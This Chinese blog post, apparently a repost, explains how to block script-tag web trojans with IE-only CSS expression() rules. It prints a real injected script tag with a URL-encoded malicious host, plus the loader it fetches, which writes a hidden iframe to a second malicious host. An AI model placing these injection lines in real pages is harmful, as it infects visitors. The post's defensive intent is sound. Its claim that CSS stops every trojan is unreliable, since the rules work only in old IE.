前不久一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在挂网马的方式真如我所料地改变了,现在流行挂<script>木马,汗了,看了几个网友的网站都被这样了——页面的顶部或底部加上了: <br><br>注意,以下地址含有木马,请不要轻易访问: <br><br><script src=http://%76%63%63%64%2E%63%6E></script> <script></script> <script></script> <script></script> <script></script> <script></script> <script></script> <script></script> 汗死,一连插入了N个一样的<script>标记。偶的电脑什么补丁都打了,直接访问这个http://%76%63%63%64%2E%63%6E(或直接使用迅雷下载),额~ 现形了: <br><br>document.write("<div style='display:none'>") <BR>document.write("<iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0>") <BR>document.write("") <BR>又用迅雷下载http://a.158dm.com/b1.htm这个文件,一看,乱七八糟的JS编码,汗,不过找到了一个类似QQ号的数字,直接加加看,汗,然后是专业提供网马的组织,哎,什么世道。还收费蛮高滴呢! <br><br>... <BR>var Kfqq, Qqs="[color=Magenta]784378237[/color]"; qwfgsg="LLLL\\XXXXXLD"; Kfqq = Qqs; <BR>(...略)(下面还有N个统计的JS代码) <BR>针对上面的情况,我也不能白白瞧着不管,想想办法吧,兄弟。喝了碗绿豆粥,糖放得蛮多的,好喝。办法想到了。稍微分析就得出了答案。大家来看看,<script>木马的特点是什么: <br><br><script src=http://%76%63%63%64%2E%63%6E></script> 对了,script木马的src一般都是外域的,也就是src是以http打头的,如果是自己网站的script一般都不用加上http;再看看木马的原形,里面还是输出的iframe、JS代码或是其他代码,不管这么多,来多少杀多少。 来跟我写CSS,一一搞定它们,我写了5种不同的方案,大家来测试一下哈: 解决方案1:
iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/ script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');}
原理:将<script>标记的src拿出来转为小写,再看是不是以“http”开头的外域JS脚本文件,如果是,则页面内容清空并写出“木马被成功隔离!”。反之正常显示。 <br><br>缺点:访客无法看到被感染了<script>木马的页面。 <br><br>解决方案2: <br><br><div class="codetitle"><span><a style="CURSOR: pointer" data="41849" class="copybut" id="copybut41849" onclick="doCopy('code41849')"><U>复制代码 代码如下:<div class="codebody" id="code41849"><BR>iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');} <BR>script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');} <BR><BR>原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写了 <BR>解决方案3: <br><br><div class="codetitle"><span><a style="CURSOR: pointer" data="19823" class="copybut" id="copybut19823" onclick="doCopy('code19823')"><U>复制代码 代码如下:<div class="codebody" id="code19823"><BR>iframe{ni3fm:expression(this.src='about:blank',this.outerHTML='');} <BR>script{n3ojs:expression((this.src.toLowerCase().indexOf('http')==0)?document.execCommand('stop'):'');} <BR><BR>原理:同到外域的JS文件,立即调用IE私有的execCommand方法来停止页面所有请求,所以接下来的外域JS文件也被强制停止下载了。就像我们点了浏览器的“停止”按钮一样。看来这是JS模拟IE停止按钮的一种方法。 <br><br>解决方案4: <br><br><div class="codetitle"><span><a style="CURSOR: pointer" data="59344" class="copybut" id="copybut59344" onclick="doCopy('code59344')"><U>复制代码 代码如下:<div class="codebody" id="code59344"><BR>iframe{nif4m:expression(this.src='about:blank',this.outerHTML='');} <BR>script{noj4s:expression(if(this.src.indexOf('http')==0)this.src='res://ieframe.dll/dnserror.htm');} <BR><BR>原理:将外域的JS文件的src重写成本地IE404错误页面的地址,这样,外域的JS代码不会下载。 <br><br>解决方案5: <br><br><div class="codetitle"><span><a style="CURSOR: pointer" data="40781" class="copybut" id="copybut40781" onclick="doCopy('code40781')"><U>复制代码 代码如下:<div class="codebody" id="code40781"><BR>iframe{nifm5:expression(this.src='about:blank',this.outerHTML='');} <BR>script{noj5s:expression((this.id.toLowerCase().indexOf('lh')==0)?document.write('木马被成功隔离!'):''));} <BR><BR>第五种方案的页面HTML源代码<script>中要加入以"lh"为前缀的id,如lhWeatherJSapi,<script src="***/**.js" id="lhSearchJSapi"></script> 以下页面代码里含有一个木马地址,而且木马在页面里重复了6次,大家分别用我上面的不同方案测试一下,看看我的研究如何!(此测试有一定的危险性,请务必打好所有补丁再测试)
nbsp;html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
让JS木马的进程迅速中止的CSS代码 <script></script> <script></script> <script></script> <script></script> 我是页面本身的1 <script></script> 我是页面本身的2 <script></script> 我是页面本身的3 <script></script>
其中1.js是自己本站的: document.write("我是本站的JS文件"); document.write(" "); 我的测试环境是: Windows XP SP2 和windows Vista SP1 IE6/IE7/IE8 已全部打好补丁。 综上所述,所有目前的挂马方式全都破解了,用CSS就可以解决所有木马问题,访客不会再轻易地中毒了。 大家也要仔细研究一下,看看我的代码有什么BUG,有的话一定要拿出来讨论,好解决问题!或是各位有其他更好的办法可以拿出来讨论一下。
Stellungnahme: Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn